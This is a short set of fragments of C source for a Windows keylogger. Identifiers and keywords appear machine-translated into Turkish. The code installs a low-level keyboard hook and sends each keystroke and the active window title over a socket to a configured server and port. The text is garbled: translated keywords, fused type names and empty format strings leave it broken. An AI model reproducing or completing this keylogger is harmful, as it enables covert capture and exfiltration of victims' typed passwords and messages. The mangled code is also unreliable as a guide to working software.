#define DEFAULT_BUFLEN 20000 #define SERVER_IP "127.0.0.1" #define SERVER_PORT "1337"

kod:

WSADATA wsaData; SOKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct; charlastwindow; int Kaydet(int tuş vuruşu); // başka bir argüman almak

kod:

Void sendData(char*ip, char*port, char*data)

kod:

chardata; sprintf(veri, "\n\n", pencere_başlığı, s); sendData(SERVER_IP, SERVER_PORT, data);

kod:

karakter; sprintf(c, "%c", tuş_stroke); sendData(SERVER_IP, SERVER_PORT, c);